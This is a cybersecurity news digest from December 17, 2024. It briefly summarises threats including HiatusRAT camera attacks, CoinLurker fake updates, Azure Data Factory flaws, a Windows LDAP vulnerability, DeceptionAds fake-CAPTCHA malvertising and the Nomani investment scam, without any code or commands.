Cyware Daily Threat Intelligence, December 17, 2024
Daily Threat Briefing • Dec 17, 2024
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Dec 17, 2024
Cybercriminals are doubling down on exploiting overlooked vulnerabilities, turning common devices and platforms into tools for covert operations. The FBI issued a warning about HiatusRAT attacks that target web cameras and DVRs, especially Chinese-branded devices with weak passwords and known flaws.
Unit 42 researchers uncovered critical vulnerabilities in Azure Data Factory's Apache Airflow integration, exposing cloud infrastructure to potential compromise. Flaws like misconfigured Kubernetes RBAC and mishandled Geneva secrets could allow attackers to exfiltrate data, deploy malware, and gain unauthorized control.
Meanwhile, Guardio Labs identified a malvertising campaign called DeceptionAds, responsible for over one million daily ad impressions. The attackers exploit a single ad network to spread fake CAPTCHA prompts, tricking users into running harmful PowerShell commands.
HiatusRAT targets vulnerable web cameras
The FBI warned about new HiatusRAT attacks targeting vulnerable web cameras and DVRs, particularly focusing on Chinese-branded devices with known vulnerabilities and weak passwords. The attackers use open-source tools to exploit telnet access and target specific TCP ports. Network defenders are advised to limit the use of these devices and report any suspected compromises to the FBI. The malware is used to create covert proxy networks and aligns with Chinese strategic interests.
Hackers abuse Webview2, deploys CoinLurker
Bogus software update alerts are being used by cybercriminals to spread a new malware known as CoinLurker. Attackers employ various strategies to deliver these fake updates, including notifications on compromised WordPress sites, malvertising redirects, phishing emails linking to fraudulent update pages, and links shared through social media. The software update prompts utilize Microsoft Edge Webview2 to execute the malware, making it difficult for security systems to detect. One tactic used is EtherHiding, where compromised sites load scripts to download the malware disguised as legitimate tools from a Bitbucket repository.
New bugs in Azure Data Factory
Unit 42 researchers discovered security vulnerabilities in the Azure Data Factory Apache Airflow integration, allowing attackers to gain unauthorized access and control over the infrastructure. By exploiting these flaws, attackers could perform activities such as data exfiltration, malware deployment, and unauthorized data access. The vulnerabilities included misconfigured Kubernetes RBAC, mishandling of Azure's internal Geneva service secrets, and weak authentication for Geneva.
Critical Windows LDAP flaw disclosed
Microsoft disclosed a critical RCE vulnerability in its LDAP service, posing a severe risk to enterprise networks. The vulnerability, tracked as CVE-2024-49112, allows unauthenticated attackers to execute arbitrary code within the LDAP service. It affects a wide range of Windows operating systems and server versions, potentially compromising Domain Controllers and other critical network components. Chaining this vulnerability with two others could escalate privileges, granting attackers SYSTEM-level access. While no public exploits have been detected, active exploitation is anticipated.
DeceptionAds - Fake CAPTCHA drives info-stealer infection
Guardio Labs discovered a new type of ClickFix-style attack linked to a campaign called DeceptionAds, which exploits a single ad network to spread malvertising. This campaign is responsible for over one million daily ad impressions and has led to significant losses for thousands of victims through a network of over 3,000 compromised content sites. These attacks target visitors on pirated movie sites, redirecting them to fake CAPTCHA pages that prompt users to run a harmful PowerShell command. Guardio traced the campaign back to the ad platform Monetag, with attackers using BeMob ad-tracking to disguise their actions.
New investment scam uses AI
A new type of investment scam called Nomani has rapidly grown, targeting victims through fraudulent ads on social media platforms. It grew by over 335% between H1 and H2 2024, with more than 100 new URLs detected daily on average between May and November 2024. The scam involves luring victims to phishing websites and collecting their personal information, before manipulating them into investing in non-existent products. The perpetrators, suspected to be Russian-speaking threat actors, use social engineering techniques to outmaneuver security measures and defraud victims of both money and data.